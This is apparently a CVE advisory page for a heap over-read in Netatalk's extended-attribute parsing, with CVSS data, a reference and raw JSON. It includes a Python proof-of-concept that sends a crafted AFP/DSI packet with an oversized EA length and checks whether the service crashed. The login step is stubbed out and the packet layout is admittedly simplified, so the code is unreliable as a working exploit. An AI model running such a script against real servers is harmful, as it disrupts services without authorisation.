Security Vulnerability Report
CVE-2026-44067 CVSS 4.2 MEDIUM

Published: 2026-05-21 08:16:22
Last Modified: 2026-05-21 15:20:19
Source: 33c584b5-0579-4c06-b2a0-8d8329fcab9c

Description

A heap over-read in extended attribute (EA) header parsing in Netatalk 2.1.0 through 4.4.2 allows a remote authenticated attacker to obtain limited information or cause a minor service disruption via crafted EA data.

CVSS Details

CVSS Score: 4.2
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Netatalk 2.1.0 - 4.4.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket

# Conceptual PoC for CVE-2026-44067
# This script demonstrates the logic to trigger the heap over-read.
# Requires a valid authenticated session to the AFP service.


def send_malicious_ea(target_ip, target_port):
    try:
        # 1. Establish TCP connection to Netatalk AFP service (default port 548)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target_ip, target_port))
        print(f"[+] Connected to {target_ip}:{target_port}")

        # 2. Perform AFP Handshake and Login (Simplified placeholder)
        # In a real scenario, specific AFP DSI OpenSession and Login requests are needed.
        # auth_payload = build_afp_login(username, password)
        # s.send(auth_payload)
        # print("[+] Authenticated successfully")

        # 3. Craft the malicious Extended Attribute (EA) header
        # The vulnerability triggers when the EA header length field indicates
        # more data than is actually present in the buffer.

        # DSI Header structure (simplified)
        dsi_command = b"\x00\x04"  # FPWrite or similar command that handles EAs
        dsi_request_id = b"\x00\x01\x00\x02"
        dsi_data_offset = b"\x00\x00\x00\x00"
        dsi_data_length = b"\x00\x00\x01\x00"  # Total length

        # Malicious EA Header
        # Setting a large length value without providing sufficient buffer data
        ea_header_length = b"\xFF\xFF"  # Abnormally large length
        crafted_ea_data = b"A" * 10  # Insufficient actual data

        payload = dsi_command + dsi_request_id + dsi_data_offset + dsi_data_length
        payload += ea_header_length + crafted_ea_data

        # 4. Send the malicious packet
        s.send(payload)
        print("[+] Malicious EA packet sent.")

        # 5. Wait for response or timeout (indicating a crash)
        s.settimeout(2)
        try:
            response = s.recv(1024)
            print(f"[!] Received response: {response}")
        except socket.timeout:
            print("[-] Connection timed out. Service may have crashed (DoS).")

        s.close()
    except Exception as e:
        print(f"[-] Error: {e}")


# Usage
# send_malicious_ea("192.168.1.10", 548)

References

https://netatalk.io/security/CVE-2026-44067

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44067", "sourceIdentifier": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "published": "2026-05-21T08:16:22.363", "lastModified": "2026-05-21T15:20:19.040", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A heap over-read in extended attribute (EA) header parsing in Netatalk 2.1.0 through 4.4.2 allows a remote authenticated attacker to obtain limited information or cause a minor service disruption via crafted EA data."}], "metrics": {"cvssMetricV31": [{"source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:L", "baseScore": 4.2, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 2.5}]}, "weaknesses": [{"source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "references": [{"url": "https://netatalk.io/security/CVE-2026-44067", "source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c"}]}}